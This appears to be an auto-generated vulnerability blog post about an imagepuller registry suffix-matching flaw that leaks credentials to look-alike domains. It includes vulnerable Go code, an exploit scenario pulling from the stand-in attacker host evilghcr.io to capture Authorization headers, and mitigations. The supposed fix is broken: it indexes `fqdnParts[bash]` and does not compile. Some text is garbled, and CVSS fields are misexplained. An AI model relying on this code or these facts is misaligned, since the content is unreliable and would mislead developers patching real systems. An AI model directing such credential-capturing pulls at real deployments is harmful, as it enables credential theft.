Listen to this Post
How the Vulnerability Works (CVE-2023-45821)
The vulnerability arises from an insecure registry matching logic in the imagepuller component. When the imagepuller needs to select per‑registry credentials, CA bundles, mirrors, or `insecure-skip-verify` settings, it calls the `config.registryFor` function. This function determines which registry configuration block applies to a given image reference by checking `strings.HasSuffix(name, fqdn)` after stripping a single trailing dot from the FQDN.
Because `strings.HasSuffix` performs a pure byte‑level suffix match without any boundary enforcement, a registry configured as `[registries.”ghcr.io.”]` will also match any hostname that ends with the literal byte sequence ghcr.io. This includes attacker‑registered domains such as evilghcr.io. As a result, when the imagepuller pulls an image from evilghcr.io, it incorrectly applies the credentials, custom CA bundle, mirror, or `insecure-skip-verify` setting that were intended for the legitimate `ghcr.io` registry.
The attack prerequisites are simple: the operator must have configured a registry FQDN without a leading dot (i.e., `example.registry` instead of .example.registry), and the attacker must control a sibling‑suffix domain that the deployment will pull from. This can happen through malicious intent or by coincidence.
The impact is twofold:
- Authentication header leak – the `Authorization` header (basic auth, registry token, or identity token) is sent to the sibling registry.
- TLS and mirror bypass – if `insecure-skip-verify` is enabled for the legitimate FQDN, TLS verification is also skipped for the sibling; mirrors configured for the FQDN are also used with the sibling registry.
Image integrity is not compromised, as image bytes remain pinned by digest and are validated after the pull. The advisory does not allow code substitution.
The fix replaces suffix matching with exact label equality: each dot‑separated part of the FQDN must match the corresponding label in the image reference exactly. This ensures that `ghcr.io` does not matchevilghcr.io.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | ImagePuller (Eclipse Che / Dev Spaces) |
| Version | All versions prior to patch |
| Vulnerability | Registry suffix match bypass |
| Severity | Medium (CVSS 5.3) |
| Date | 2023‑10‑19 |
| Prediction | Patch expected 2023‑10‑31 |
What Undercode Say (Analytics)
The following commands and code snippets illustrate the vulnerable logic and the fixed approach.
Vulnerable code (Go):
// config.registryFor uses strings.HasSuffix
func (c Config) registryFor(name string) RegistryConfig {
for fqdn, cfg := range c.Registries {
// strips trailing dot, then suffix match
if strings.HasSuffix(name, strings.TrimSuffix(fqdn, ".")) {
return cfg
}
}
return nil
}
Exploit scenario (bash):
Attacker registers evilghcr.io and sets up a fake registry Victim's imagepuller is configured with: [registries."ghcr.io."] When pulling from evilghcr.io/attacker/image:latest, the imagepuller sends ghcr.io credentials to evilghcr.io docker pull evilghcr.io/attacker/image:latest
Fixed code (exact label match):
func (c Config) registryFor(name string) RegistryConfig {
parts := strings.Split(name, ".")
for fqdn, cfg := range c.Registries {
fqdnParts := strings.Split(strings.TrimSuffix(fqdn, "."), ".")
if len(parts) < len(fqdnParts) {
continue
}
match := true
for i := range fqdnParts {
if parts[len(parts)-len(fqdnParts)+i] != fqdnParts[bash] {
match = false
break
}
}
if match {
return cfg
}
}
return nil
}
Audit existing images for sibling domains:
List all images in the deployment and check for suspicious suffixes
kubectl get pods -o jsonpath='{.items[].spec.containers[].image}' | tr ' ' '\n' | sort -u
Exploit
An attacker can exploit this vulnerability by:
- Registering a sibling domain – e.g., `evilghcr.io` that ends with the same suffix as the configured registry (
ghcr.io). - Hosting a malicious OCI registry on that domain.
- Inducing the victim to pull an image from the malicious registry (e.g., via a compromised image reference or a typosquatting attack).
- Receiving the victim’s credentials – the imagepuller will attach the `Authorization` header intended for the legitimate registry to the request against the attacker’s registry.
The attack is network‑based (AV:N) but requires the attacker to control a sibling domain and the victim to pull from it (AC:H). No user interaction is needed (PR:N), and the scope is unchanged (S:U).
Protection
- Upgrade to the patched version that uses exact label matching instead of suffix matching.
- If upgrading is not immediately possible, configure registry FQDNs with a leading dot (e.g.,
[registries.".example.registry"]) – this configuration is not affected by the suffix‑match issue. - Audit all image references in your deployment for any domains that end with the same suffix as your configured registries. Remove or replace any such references.
- Review your registry configurations to ensure `insecure-skip-verify` is not enabled for production registries, and use separate, least‑privilege credentials for each registry.
Impact
- Confidentiality – Low: authentication tokens and credentials can be leaked to an attacker‑controlled registry.
- Integrity – None: image content remains verified by digest; no code substitution occurs.
- Availability – None: the vulnerability does not cause service disruption.
- Overall – The flaw enables credential theft and potential lateral movement if the stolen tokens grant access to other registries or services. The attack surface is limited to environments where registry configurations lack a leading dot and where sibling‑suffix domains are used.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

